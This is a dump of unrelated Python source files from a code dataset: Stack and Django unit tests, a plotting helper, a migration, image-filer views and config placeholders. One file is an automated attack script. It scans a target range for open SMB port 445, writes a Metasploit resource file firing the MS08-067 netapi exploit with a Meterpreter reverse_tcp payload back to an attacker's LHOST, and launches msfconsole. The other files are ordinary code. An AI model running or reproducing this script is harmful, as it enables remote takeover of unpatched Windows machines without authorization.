    assert angles.R_bi() == pytest.approx(expected)
def test_repr():
    """repr() runs without raising and yields a non-empty string.

    The original test discarded the repr() result and asserted nothing;
    now the return value is actually checked.
    """
    text = repr(EulerAngles([1, 2, 3]))
    assert isinstance(text, str) and text
| StarcoderdataPython |
1640559 | """Test module for Stack class."""
from stack import Stack
import pytest
# *****Fixtures*****
@pytest.fixture
def empty_stack():
    """Provide a fresh, empty Stack instance for each test."""
    return Stack()
@pytest.fixture
def filled_stack():
    """Provide a Stack pre-filled with eight known values (top is 9)."""
    return Stack([12, 31, 41, 32, 65, 76, 3, 9])
# *****Tests*****
def test_stack_can_be_created():
    """A Stack can be instantiated with no arguments."""
    assert isinstance(Stack(), Stack)
def test_stack_can_be_created_with_iter():
    """A Stack can be instantiated from an iterable of values."""
    assert isinstance(Stack([1, 2, 3, 4, 5, 6]), Stack)
def test_add_works(empty_stack):
    """After adding 99 to an empty stack, 99 is the top value."""
    empty_stack.add(99)
    top_node = empty_stack.top
    assert top_node.value == 99
def test_add_works_with_multiple_adds(empty_stack):
    """After pushing 0..19, the top value is the last pushed (19)."""
    for value in range(20):
        empty_stack.add(value)
    assert empty_stack.top.value == 19
def test_height_method_works_on_empty_stack(empty_stack):
    """An empty stack reports a height of zero."""
    assert not empty_stack.height
def test_height_works_while_adding_20_nodes(empty_stack):
    """Height tracks the push count after every single add."""
    for expected_height, value in enumerate(range(20), start=1):
        empty_stack.add(value)
        assert empty_stack.height == expected_height
def test_height_method_works_on_filled_stack(filled_stack):
    """The eight-item fixture stack reports a height of 8."""
    assert filled_stack.height == 8
def test_height_goes_up_when_add_to_stack(empty_stack):
    """A single add brings an empty stack's height to 1."""
    empty_stack.add(9)
    assert empty_stack.height == 1
def test_pop_method_returns_proper_value(filled_stack):
    """pop() returns the most recently pushed value (9) from the fixture."""
    popped = filled_stack.pop()
    assert popped == 9
| StarcoderdataPython |
1693283 | <gh_stars>1-10
# coding=utf-8
import nmap
import optparse
import os
def setexploit(configfile,rhost,lhost,lport):
configfile.write('use exploit/windows/smb/ms08_067_netapi\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set RHOST '+str(rhost)+'\n')
configfile.write('set LPORT '+str(lport)+'\n')
configfile.write('set LHOST '+lhost+'\n')
configfile.write('exploit \n')
configfile.close()
def sethande(configfile,lhost,lport):
configfile.write('use exploit/multi/handler\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp \n')
configfile.write('set LPORT '+str(lport)+'\n')
configfile.write('set LHOST ' + str(lhost) + '\n')
configfile.write('set DisablePayloadHandler 1\n')
configfile.write('exploit -j -z\n')
def scan445(new_ip):
new_ip = str(new_ip)
# 实例化
nm = nmap.PortScanner()
# scan扫描方法
ping_scan_raw = nm.scan(hosts=new_ip,ports='445',arguments='-sS')
# 返回一个存活列表
list_ip = nm.all_hosts()
# print list_ip
# print ping_scan_raw
for list in list_ip:
host_status = ping_scan_raw['scan'][list]['status']['state']
port_status = ping_scan_raw['scan'][list]['tcp'][445]['state']
# print list + port_status
# print list + host_status
tlist = []
if host_status == 'up' and port_status == 'open':
tlist.append(list)
return tlist
else:
return None
def main():
parser = optparse.OptionParser()
parser.add_option('-t','--tag',dest = 'tag',help = 'tag')
parser.add_option('-l','--lhost',dest = 'lhost',help = 'lhost')
parser.add_option('-p','--lpost',dest = 'lport',help = 'lpost')
(options,args) = parser.parse_args()
if(options.tag == None) or (options.lhost == None) or (options.lport == None):
print "参数错误"
exit(0)
else:
ip = str(options.tag)
# t = ip.split('.')[3]
lhost = str(options.lhost)
lport = str(options.lport)
flag = scan445(ip)
# print flag
configfile = open('ms08_067.rc','w')
sethande(configfile,lhost,lport)
for target in flag:
setexploit(configfile,target,lhost,lport)
os.system('msfconsole -r ms08_067.rc')
# host0 = ip.split('.')[0]
# host1 = ip.split('.')[1]
# host2 = ip.split('.')[2]
# host = host0 + '.' + host1 + '.' + host2
# i = 1
# while i < 255:
# new_ip = host + '.' + str(i)
# # result = os.system("ping " + new_ip + " -c 1 -i 1")\
# flag = scan445(new_ip)
# if (flag == 1):
# print ip + " open"
# elif (flag == 0):
# print ip + " close"
# elif (flag == -1):
# print new_ip + 'no ping'
# i += 1
if __name__ == '__main__':
main()
| StarcoderdataPython |
38668 | from django.contrib.auth.models import User
from rollservice.models import DiceSequence
import rest_framework.test as rf_test
import rest_framework.status as status
import rest_framework.reverse as reverse
import hypothesis.extra.django
import hypothesis.strategies as strategies
import unittest
class DiceSeqStrategies:
    """Hypothesis strategies for generating dice-sequence test data and URLs."""
    # Die sizes restricted to the standard polyhedral set; at least one die.
    dice_rolls = strategies.lists(
        elements=strategies.sampled_from([4, 6, 8, 10, 12, 20, 100]),
        min_size=1
    )
    # A single fixed user payload (placeholders come from the dataset scrub).
    user = strategies.just(dict(
        username='dungeon_master',
        email='<EMAIL>',
        password='<PASSWORD>'
    ))
    @strategies.composite
    def seq_name(draw):
        # Names like 'Roll 1', 'Roll 2', ...
        seq_number = draw(strategies.integers(min_value=1))
        return f'Roll {seq_number}'
    @strategies.composite
    def dice_sequence(draw, seq_name=seq_name(), dice_rolls=dice_rolls):
        # Combine a generated name with a generated list of die sizes.
        seq_name = draw(seq_name)
        dice_sequence = draw(dice_rolls)
        return dict(
            seq_name=seq_name,
            dice_sequence=dice_sequence
        )
    dice_sequence_list = strategies.lists(elements=dice_sequence(), min_size=1)
    @strategies.composite
    def existing_uuid(draw, queryset):
        # Pick the uuid of a random row already present in `queryset`.
        max_value = len(queryset) - 1
        index = draw(strategies.integers(min_value=0, max_value=max_value))
        return queryset[index].uuid
    non_existing_uuid = strategies.uuids()
    invalid_uuid = strategies.text(max_size=100)
    @strategies.composite
    def existing_uuid_url(draw, queryset):
        # URL resolving to a row that exists in the database.
        max_value = len(queryset) - 1
        index = draw(strategies.integers(min_value=0, max_value=max_value))
        uuid = queryset[index].uuid
        url = reverse.reverse('dice-seq-by-uuid', args=[uuid])
        return url
    @strategies.composite
    def non_existing_uuid_url(draw, queryset, non_existing_uuid=non_existing_uuid):
        # Well-formed UUID URL that should not match any row.
        uuid = draw(non_existing_uuid)
        url = reverse.reverse('dice-seq-by-uuid', args=[uuid])
        return url
    @strategies.composite
    def invalid_uuid_url(draw, invalid_uuid=invalid_uuid):
        # Malformed UUID segment, built by string concatenation because
        # reverse() would reject a non-UUID argument.
        uuid = draw(invalid_uuid)
        url_root = reverse.reverse('dice-seq')
        url = url_root + '/by_uuid/' + uuid + '/'
        return url
class DiceSequenceByUUIDTests(hypothesis.extra.django.TestCase):
    """GET /dice-seq/by_uuid/<uuid>/ behaviour for existing, missing and malformed UUIDs."""
    @classmethod
    def setUpTestData(cls):
        # NOTE(review): .example() is non-deterministic and discouraged by
        # Hypothesis outside interactive use — the fixture data (and thus
        # `queryset`) varies from run to run.
        sequences = DiceSeqStrategies.dice_sequence_list.example()
        new_user = DiceSeqStrategies.user.example()
        owner = User.objects.create(**new_user)
        for sequence in sequences:
            dice_sequence = DiceSequence.objects.create(seq_name=sequence['seq_name'], owner=owner)
            dice_sequence.sequence.set(sequence['dice_sequence'])
    # Evaluated at class-definition time and fed into the strategies below.
    queryset = DiceSequence.objects.all()
    client_class = rf_test.APIClient
    @hypothesis.given(DiceSeqStrategies.existing_uuid_url(queryset=queryset))
    def test_dice_seq_by_uuid_GET_with_existing_uuid_should_return_OK(self, url):
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
    @hypothesis.given(DiceSeqStrategies.non_existing_uuid_url(queryset=queryset))
    def test_dice_seq_by_uuid_GET_with_non_existing_uuid_should_return_NOT_FOUND(self, url):
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
    @hypothesis.given(DiceSeqStrategies.invalid_uuid_url())
    def test_dice_seq_by_uuid_GET_with_invalid_uuid_should_return_BAD_REQUEST(self, url):
        # Malformed UUIDs may 404 (no route match) or 400 depending on routing.
        response = self.client.get(url)
        self.assertIn(response.status_code, [status.HTTP_404_NOT_FOUND, status.HTTP_400_BAD_REQUEST])
    @hypothesis.given(strategies.one_of([
        DiceSeqStrategies.existing_uuid_url(queryset=queryset),
        DiceSeqStrategies.non_existing_uuid_url(queryset=queryset),
        DiceSeqStrategies.invalid_uuid_url(),
    ]))
    def test_dice_seq_by_uuid_GET_idempotent(self, url):
        # Two identical GETs must yield the same status code.
        response1 = self.client.get(url)
        response2 = self.client.get(url)
        self.assertEqual(response1.status_code, response2.status_code)
| StarcoderdataPython |
9826 | # OpenWeatherMap API Key
weather_api_key = "MyOpenWeatherMapAPIKey"
# Google API Key
g_key = "MyGoogleKey" | StarcoderdataPython |
136846 | <filename>epitopedia/viz/figure.py
import seaborn as sns
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size':20})
import pickle
import numpy as np
def zscores(std, mean, score):
    """Map a z-score back onto the raw scale: raw = mean + std * score."""
    return mean + std * score
def plot_dist(data, data_point, name, label="RMSD (Å)"):
    """Save a histogram of `data` with mean/±1-std reference lines.

    Args:
        data: sequence of values (e.g. RMSDs) to histogram.
        data_point: z-score of the hit to highlight with a red line, or
            None to draw no highlight line.
        name: output image path passed to plt.savefig.
        label: x-axis label prefix.
    """
    data = np.array(data)
    std = np.std(data)
    mean = np.average(data)
    sns.displot(data, binwidth=.1)
    plt.xlabel(f"{label}\nGrey lines represent -1, 0 (mean) and 1 Std Dev\nRed line represents value for hit")
    # Grey reference lines at the mean and ±1 standard deviation.
    plt.axvline(x=zscores(std, mean, -1), color='gray')
    plt.axvline(x=mean, color='gray')
    plt.axvline(x=zscores(std, mean, 1), color='gray')
    # Compare against None explicitly: a z-score of 0 (a hit exactly at the
    # mean) is falsy but is still a valid point to highlight.
    if data_point is not None:
        plt.axvline(zscores(std, mean, data_point), color='r')
    fig = plt.gcf()
    fig.set_size_inches(8, 4)
    plt.tight_layout()
    plt.savefig(name)
    plt.close("all")
def plot_bivariate(lens, rmsds):
    """Save a 2D histogram of fragment lengths vs RMSDs.

    Note: always writes to the fixed filename 'plot_dist.png' in the
    current working directory.
    """
    sns.displot(x=lens, y=rmsds, binwidth=(1, .1))
    plt.savefig("plot_dist.png")
    plt.close()
if __name__ == "__main__":
with open("/app/output/EPI_PDB_fragment_pairs_6XR8_A_exp.pickle", 'rb') as inhandle:
data = pickle.load(inhandle)
plot_bivariate(data["lens"], data["rmsds"])
| StarcoderdataPython |
1776519 | <filename>apps/base/migrations/0005_auto_20181120_1224.py
# Generated by Django 2.1.3 on 2018-11-20 12:24
from django.db import migrations, models
class Migration(migrations.Migration):
    """base 0005: add optional `dp` URL to User and relax other profile fields.

    `mobile_no`, `review` and `social_url` become blank/null-able; no data
    migration is required.
    """
    dependencies = [
        ('base', '0004_auto_20181120_1112'),
    ]
    operations = [
        migrations.AddField(
            model_name='user',
            name='dp',
            field=models.URLField(blank=True, max_length=1000, null=True),
        ),
        migrations.AlterField(
            model_name='user',
            name='mobile_no',
            field=models.CharField(blank=True, max_length=24, null=True),
        ),
        migrations.AlterField(
            model_name='user',
            name='review',
            field=models.TextField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='user',
            name='social_url',
            field=models.URLField(blank=True, max_length=1000, null=True),
        ),
    ]
| StarcoderdataPython |
3390898 | <reponame>stefanfoulis/django-image-filer
import os
from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse, HttpResponseForbidden, HttpResponseBadRequest
from django.contrib.sessions.models import Session
from django.conf import settings
from django.db.models import Q
from django.core.exceptions import PermissionDenied
from models import Folder, Image, Clipboard, ClipboardItem
from models import tools
from models import FolderRoot, UnfiledImages, ImagesWithMissingData
from django.contrib.auth.models import User
from django import forms
from django.contrib import admin
class NewFolderForm(forms.ModelForm):
    """ModelForm for creating a Folder; only the 'name' field is user-editable."""
    class Meta:
        model = Folder
        fields = ('name', )
def popup_status(request):
    """Return True when the request carries a popup marker ('_popup' or 'pop').

    Uses the ``in`` operator instead of ``dict.has_key``, which was removed
    in Python 3; behaviour is otherwise unchanged.
    """
    return '_popup' in request.REQUEST or 'pop' in request.REQUEST
def selectfolder_status(request):
    """Return True when the request asks for folder-selection mode.

    Uses the ``in`` operator instead of ``dict.has_key``, which was removed
    in Python 3; behaviour is otherwise unchanged.
    """
    return 'select_folder' in request.REQUEST
def popup_param(request):
    """Query-string suffix that propagates popup mode to follow-up URLs."""
    return "?_popup=1" if popup_status(request) else ""
def _userperms(item, request):
r = []
ps = ['read', 'edit', 'add_children']
for p in ps:
attr = "has_%s_permission" % p
if hasattr(item, attr):
x = getattr(item, attr)(request)
if x:
r.append( p )
return r
@login_required
def directory_listing(request, folder_id=None, viewtype=None):
    """Main browser view: list the sub-folders and images of one folder.

    ``viewtype`` selects a virtual folder ('images_with_missing_data' or
    'unfiled_images'); with neither a viewtype nor a ``folder_id`` the
    virtual root is shown.  A free-text search over names/owner fields is
    available via the ``q`` GET parameter, optionally limited to the
    current folder's subtree, and results are filtered by the requesting
    user's read permission.
    """
    clipboard = tools.get_user_clipboard(request.user)
    # Resolve the "folder" to display: a real Folder row or one of the
    # virtual pseudo-folders.
    if viewtype=='images_with_missing_data':
        folder = ImagesWithMissingData()
    elif viewtype=='unfiled_images':
        folder = UnfiledImages()
    elif folder_id == None:
        folder = FolderRoot()
    else:
        folder = Folder.objects.get(id=folder_id)
    # search
    def filter_folder(qs, terms=[]):
        # AND-combine the terms; each term may match the folder name or any
        # of the owner's identifying fields.
        # NOTE(review): mutable default argument — harmless here because
        # ``terms`` is only iterated, never mutated.
        for term in terms:
            qs = qs.filter(Q(name__icontains=term) | Q(owner__username__icontains=term) | Q(owner__first_name__icontains=term) | Q(owner__last_name__icontains=term) )
        return qs
    def filter_image(qs, terms=[]):
        # Same AND-combination, additionally matching the original filename.
        for term in terms:
            qs = qs.filter( Q(name__icontains=term) | Q(original_filename__icontains=term ) | Q(owner__username__icontains=term) | Q(owner__first_name__icontains=term) | Q(owner__last_name__icontains=term) )
        return qs
    q = request.GET.get('q', None)
    if q:
        search_terms = q.split(" ")
    else:
        search_terms = []
    # The checkbox arrives as 'on' when ticked; absent means False.
    limit_search_to_folder = request.GET.get('limit_search_to_folder', False) in (True, 'on')
    if len(search_terms)>0:
        # Search mode: either the current subtree or the whole database.
        if folder and limit_search_to_folder and not folder.is_root:
            folder_qs = folder.get_descendants()
            # TODO: check how folder__in=folder.get_descendats() performs in large trees
            image_qs = Image.objects.filter(folder__in=folder.get_descendants())
        else:
            folder_qs = Folder.objects.all()
            image_qs = Image.objects.all()
        folder_qs = filter_folder(folder_qs, search_terms)
        image_qs = filter_image(image_qs, search_terms)
        show_result_count = True
    else:
        # Browse mode: direct children of the current folder only.
        folder_qs = folder.children.all()
        image_qs = folder.image_files.all()
        show_result_count = False
    folder_qs = folder_qs.order_by('name')
    image_qs = image_qs.order_by('name')
    folder_children = []
    folder_files = []
    # Keep only objects the user may read; objects that don't implement
    # has_read_permission are treated as readable by everyone.
    for f in folder_qs:
        f.perms = _userperms(f, request)
        if hasattr(f, 'has_read_permission'):
            if f.has_read_permission(request):
                #print "%s has read permission for %s" % (request.user, f)
                folder_children.append(f)
            else:
                pass#print "%s has NO read permission for %s" % (request.user, f)
        else:
            folder_children.append(f)
    for f in image_qs:
        f.perms = _userperms(f, request)
        if hasattr(f, 'has_read_permission'):
            if f.has_read_permission(request):
                #print "%s has read permission for %s" % (request.user, f)
                folder_files.append(f)
            else:
                pass#print "%s has NO read permission for %s" % (request.user, f)
        else:
            folder_files.append(f)
    try:
        permissions = {
            'has_edit_permission': folder.has_edit_permission(request),
            'has_read_permission': folder.has_read_permission(request),
            'has_add_children_permission': folder.has_add_children_permission(request),
        }
    except:
        # NOTE(review): bare except — presumably here because virtual
        # folders lack these permission methods, but it also swallows real
        # errors; consider narrowing to AttributeError.
        permissions = {}
    #print admin.site.root_path
    return render_to_response('image_filer/directory_listing.html', {
            'folder':folder,
            'folder_children':folder_children,
            'folder_files':folder_files,
            'permissions': permissions,
            'permstest': _userperms(folder, request),
            'current_url': request.path,
            'title': u'Directory listing for %s' % folder.name,
            'search_string': ' '.join(search_terms),
            'show_result_count': show_result_count,
            'limit_search_to_folder': limit_search_to_folder,
            'is_popup': popup_status(request),
            'select_folder': selectfolder_status(request),
            'root_path': "/%s" % admin.site.root_path, # needed in the admin/base.html template for logout links and stuff
        }, context_instance=RequestContext(request))
@login_required
def edit_folder(request, folder_id):
    """Placeholder folder-edit view: renders the template with folder=None.

    TODO: implement edit_folder view
    """
    folder = None
    return render_to_response('image_filer/folder_edit.html', {
        'folder': folder,
        # use the shared helper instead of repeating the deprecated
        # has_key() checks inline
        'is_popup': popup_status(request),
    }, context_instance=RequestContext(request))
@login_required
def edit_image(request, folder_id):
    """Placeholder image-edit view: renders the template with folder=None.

    TODO: implement edit_image view
    """
    folder = None
    return render_to_response('image_filer/image_edit.html', {
        'folder': folder,
        # use the shared helper instead of repeating the deprecated
        # has_key() checks inline
        'is_popup': popup_status(request),
    }, context_instance=RequestContext(request))
@login_required
def make_folder(request, folder_id=None):
    """Create a new Folder below ``folder_id`` (or as a root folder).

    The parent may alternatively be passed as the ``parent_id`` request
    parameter.  Only superusers may create root folders; other users need
    add-children permission on the parent, otherwise PermissionDenied is
    raised.  A successful POST answers with a small script that closes
    the popup; a GET (or invalid POST) renders the form.
    """
    if not folder_id:
        folder_id = request.REQUEST.get('parent_id', None)
    if folder_id:
        folder = Folder.objects.get(id=folder_id)
    else:
        folder = None
    if request.user.is_superuser:
        pass
    elif folder == None:
        # regular users may not add root folders
        raise PermissionDenied
    elif not folder.has_add_children_permission(request):
        # the user does not have the permission to add subfolders
        raise PermissionDenied
    if request.method == 'POST':
        new_folder_form = NewFolderForm(request.POST)
        if new_folder_form.is_valid():
            new_folder = new_folder_form.save(commit=False)
            new_folder.parent = folder
            new_folder.owner = request.user
            new_folder.save()
            return HttpResponse('<script type="text/javascript">opener.dismissPopupAndReload(window);</script>')
        # invalid POST falls through and re-renders the bound form
    else:
        new_folder_form = NewFolderForm()
    return render_to_response('image_filer/include/new_folder_form.html', {
        'new_folder_form': new_folder_form,
        # shared helper replaces the repeated, deprecated has_key() checks
        'is_popup': popup_status(request),
    }, context_instance=RequestContext(request))
class UploadFileForm(forms.ModelForm):
    """ModelForm used by ajax_upload() to validate and save one Image.

    NOTE(review): no ``fields``/``exclude`` is declared, so every Image
    model field is form-editable — confirm that is intended.
    """
    class Meta:
        model=Image
        #fields = ('file',)
from image_filer.utils.files import generic_handle_file
@login_required
def upload(request):
    """Render the standalone file-upload page."""
    context = {
        'title': u'Upload files',
        'is_popup': popup_status(request),
    }
    return render_to_response('image_filer/upload.html', context,
                              context_instance=RequestContext(request))
def ajax_upload(request, folder_id=None):
"""
receives an upload from the flash uploader and fixes the session
because of the missing cookie. Receives only one file at the time,
althow it may be a zip file, that will be unpacked.
"""
#print request.POST
# flashcookie-hack (flash does not submit the cookie, so we send the
# django sessionid over regular post
try:
engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])
#session_key = request.POST.get('jsessionid')
session_key = request.POST.get('jsessionid')
request.session = engine.SessionStore(session_key)
request.user = User.objects.get(id=request.session['_auth_user_id'])
#print request.session['_auth_user_id']
#print session_key
#print engine
#print request.user
#print request.session
# upload and save the file
if not request.method == 'POST':
return HttpResponse("must be POST")
original_filename = request.POST.get('Filename')
file = request.FILES.get('Filedata')
#print request.FILES
#print original_filename, file
clipboard, was_clipboard_created = Clipboard.objects.get_or_create(user=request.user)
files = generic_handle_file(file, original_filename)
file_items = []
for ifile, iname in files:
try:
iext = os.path.splitext(iname)[1].lower()
except:
iext = ''
#print "extension: ", iext
if iext in ['.jpg','.jpeg','.png','.gif']:
imageform = UploadFileForm({'original_filename':iname,'owner': request.user.pk}, {'file':ifile})
if imageform.is_valid():
#print 'imageform is valid'
try:
image = imageform.save(commit=False)
image.save()
file_items.append(image)
except Exception, e:
print e
#print "save %s" % image
bi = ClipboardItem(clipboard=clipboard, file=image)
bi.save()
#sprint image
else:
pass#print imageform.errors
except Exception, e:
print e
raise e
return render_to_response('image_filer/include/clipboard_item_rows.html', {'items': file_items }, context_instance=RequestContext(request))
@login_required
def paste_clipboard_to_folder(request):
    """Move every file on the clipboard into the selected folder, then
    redirect back (preserving popup mode).

    Raises PermissionDenied unless the user may add children to the
    target folder.
    """
    if request.method == 'POST':
        target = Folder.objects.get(id=request.POST.get('folder_id'))
        clip = Clipboard.objects.get(id=request.POST.get('clipboard_id'))
        if not target.has_add_children_permission(request):
            raise PermissionDenied
        tools.move_files_from_clipboard_to_folder(clip, target)
        tools.discard_clipboard(clip)
    redirect_base = request.REQUEST.get('redirect_to', '')
    return HttpResponseRedirect('%s%s' % (redirect_base, popup_param(request)))
@login_required
def discard_clipboard(request):
    """Discard the posted clipboard via tools.discard_clipboard, then
    redirect back (preserving popup mode)."""
    if request.method == 'POST':
        clip = Clipboard.objects.get(id=request.POST.get('clipboard_id'))
        tools.discard_clipboard(clip)
    redirect_base = request.POST.get('redirect_to', '')
    return HttpResponseRedirect('%s%s' % (redirect_base, popup_param(request)))
@login_required
def delete_clipboard(request):
    """Delete the posted clipboard via tools.delete_clipboard, then
    redirect back (preserving popup mode)."""
    if request.method == 'POST':
        clip = Clipboard.objects.get(id=request.POST.get('clipboard_id'))
        tools.delete_clipboard(clip)
    redirect_base = request.POST.get('redirect_to', '')
    return HttpResponseRedirect('%s%s' % (redirect_base, popup_param(request)))
@login_required
def move_file_to_clipboard(request):
    """Move one image onto the requesting user's clipboard, then redirect.

    POST parameters: ``file_id`` (Image pk) and optional ``redirect_to``.
    Raises PermissionDenied if the user lacks edit permission on the image.
    """
    # removed leftover debug `print "move file"` statement
    if request.method == 'POST':
        file_id = request.POST.get("file_id", None)
        clipboard = tools.get_user_clipboard(request.user)
        if file_id:
            # renamed from `file` to avoid shadowing the builtin
            image = Image.objects.get(id=file_id)
            if image.has_edit_permission(request):
                tools.move_file_to_clipboard([image], clipboard)
            else:
                raise PermissionDenied
    return HttpResponseRedirect('%s%s' % (request.POST.get('redirect_to', ''), popup_param(request)))
@login_required
def clone_files_from_clipboard_to_folder(request):
    """Copy (not move) the clipboard's files into the selected folder,
    then redirect back (preserving popup mode).

    NOTE(review): unlike paste_clipboard_to_folder there is no
    add-children permission check here — confirm that is intended.
    """
    if request.method == 'POST':
        clip = Clipboard.objects.get(id=request.POST.get('clipboard_id'))
        target = Folder.objects.get(id=request.POST.get('folder_id'))
        tools.clone_files_from_clipboard_to_folder(clip, target)
    redirect_base = request.POST.get('redirect_to', '')
    return HttpResponseRedirect('%s%s' % (redirect_base, popup_param(request)))
class ImageExportForm(forms.Form):
    """Options for exporting a resized/re-encoded copy of an image
    (consumed by export_image())."""
    FORMAT_CHOICES = (
        ('jpg', 'jpg'),
        ('png', 'png'),
        ('gif', 'gif'),
        #('tif', 'tif'),
    )
    # output encoding of the exported file
    format = forms.ChoiceField(choices=FORMAT_CHOICES)
    # forwarded to filters.ResizeFilter.render — presumably crop-to-fit
    # vs. fit-inside; confirm against the filter implementation
    crop = forms.BooleanField(required=False)
    # forwarded to filters.ResizeFilter.render — presumably allows
    # enlarging images smaller than the target size
    upscale = forms.BooleanField(required=False)
    # target size in pixels
    width = forms.IntegerField()
    height = forms.IntegerField()
import filters
@login_required
def export_image(request, image_id):
    """Show an export form for ``image_id`` and, on a valid POST, stream
    back the image resized and re-encoded per the submitted options.

    The response is sent as an attachment named
    ``exported_image.<format>`` with the matching Content-Type.
    """
    image = Image.objects.get(id=image_id)
    if request.method == 'POST':
        form = ImageExportForm(request.POST)
        if form.is_valid():
            resize_filter = filters.ResizeFilter()
            im = filters.Image.open(image.file.path)
            # renamed from `format` to avoid shadowing the builtin
            export_format = form.cleaned_data['format']
            if export_format == 'png':
                # BUGFIX: was 'image/jpg' for PNG exports
                mimetype = 'image/png'
                pil_format = 'PNG'
            #elif export_format=='tif':
            #    mimetype='image/tiff'
            #    pil_format = 'TIFF'
            elif export_format == 'gif':
                mimetype = 'image/gif'
                pil_format = 'GIF'
            else:
                # 'image/jpeg' is the registered JPEG media type
                # ('image/jpg' is not a valid type)
                mimetype = 'image/jpeg'
                pil_format = 'JPEG'
            im = resize_filter.render(im,
                    size_x=int(form.cleaned_data['width']),
                    size_y=int(form.cleaned_data['height']),
                    crop=form.cleaned_data['crop'],
                    upscale=form.cleaned_data['upscale']
            )
            response = HttpResponse(mimetype='%s' % mimetype)
            response['Content-Disposition'] = 'attachment; filename=exported_image.%s' % export_format
            im.save(response, pil_format)
            return response
        # invalid POST falls through and re-renders the bound form
    else:
        form = ImageExportForm(initial={'crop': True, 'width': image.file.width, 'height': image.file.height})
    return render_to_response('image_filer/image_export_form.html', {
        'form': form,
        'image': image
    }, context_instance=RequestContext(request))
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.